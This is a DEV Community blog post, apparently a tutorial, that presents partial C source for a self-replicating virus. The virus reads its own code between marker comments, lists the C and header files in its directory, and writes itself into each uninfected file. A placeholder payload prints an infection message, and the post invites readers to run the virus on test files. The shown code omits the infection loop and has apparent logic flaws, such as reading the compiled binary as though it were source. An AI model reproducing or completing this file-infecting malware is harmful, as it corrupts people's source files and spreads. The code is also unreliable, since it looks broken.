DEV Community

Aymen Hmani
Aymen Hmani

Posted on

Make a Self-Replicating Virus in C

In this article, we’ll be learning how to make a simple computer virus in C.

we will be writing a program to infect all the C files present in the same directory with the self-replicating code and perform malicious activities through the infected C files.

DISCLAIMER : THIS TUTORIAL IS FOR EDUCATION PURPOSES ONLY AND IS NOT INTENDED TO PROMOTE ANY ILLEGAL ACTIVITIES. THE AUTHOR WILL NOT BE HELD RESPONSIBLE FOR ANY MISUSE OF THE INFORMATION PROVIDED.

we need :

To make a copy of the entire virus program itself.
To get other C files and infect them with the replicating code.
To deploy the payload or malware/spyware code.
To mark the start and end of the virus program we need to put tags in the first and the last line of the code.

// VIRUS SAYS HI!
{ virus code }
// VIRUS SAYS BYE!
Enter fullscreen mode Exit fullscreen mode

Next, we import all the required C libraries.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
Enter fullscreen mode Exit fullscreen mode

The virus begins with a simple payload, a function that prints "YOU HAVE BEEN INFECTED HAHAHA !!!" to the console. This is the malicious code that will be executed on the infected system.

int main(int argc, char *argv[])
{
    malicious_code();

    char self_replicating_part = 0;
    char line[MAX_LINE_LENGTH];
    char virus_code[MAX_LINE_LENGTH][MAX_LINE_LENGTH];
    int virus_code_line_count = 0;

    // Open the current file
    FILE *file = fopen(argv[0], "r");
    if (file == NULL)
    {
        printf("Error reading current file\n");
        exit(1);
    }

Enter fullscreen mode Exit fullscreen mode

The main function of the virus is responsible for executing the payload and replicating itself. It starts by calling the malicious code function and initializing some variables. It opens the current file, which is the virus program itself, using the fopen function.

    // Read the current file line by line
    while (fgets(line, MAX_LINE_LENGTH, file))
    {
        if (strcmp(line, "// VIRUS SAYS HI!\n") == 0)
        {
            self_replicating_part = 1;
        }
        if (!self_replicating_part)
        {
            strcpy(virus_code[virus_code_line_count], line);
            virus_code_line_count++;
        }
        if (strcmp(line, "// VIRUS SAYS BYE!\n") == 0)
        {
            break;
        }
    }
    fclose(file);

Enter fullscreen mode Exit fullscreen mode

It then reads the current file line by line, looking for a specific string "// VIRUS SAYS HI!" which marks the beginning of the virus code and "// VIRUS SAYS BYE!" that marks the end of the virus code. It copies the virus code to an array, so it can be used to infect other files.

    char command[100];
    sprintf(command, "ls -1 *.c *.cpp *.h");
    FILE *ls = popen(command, "r");
    if (!ls)
    {
        printf("Error listing files\n");
        exit(1);
    }

Enter fullscreen mode Exit fullscreen mode

The virus then uses the popen function to list all the files in the current directory with the extensions .c, .cpp and .h using the command "ls -1 *.c *.cpp *.h".

Once the virus has a list of all the files in the current directory, it begins to iterate through each file. For each file, the virus first checks if the file has already been infected by searching for the "// VIRUS SAYS HI!" tag. If the file is not infected, it proceeds to infect the file by writing the self-replicating virus code to the file.
Create some test files in the same directory and with caution try executing your very own self-replicating virus!

Thank you, take care and don’t try this at home!

Code to download

Top comments (0)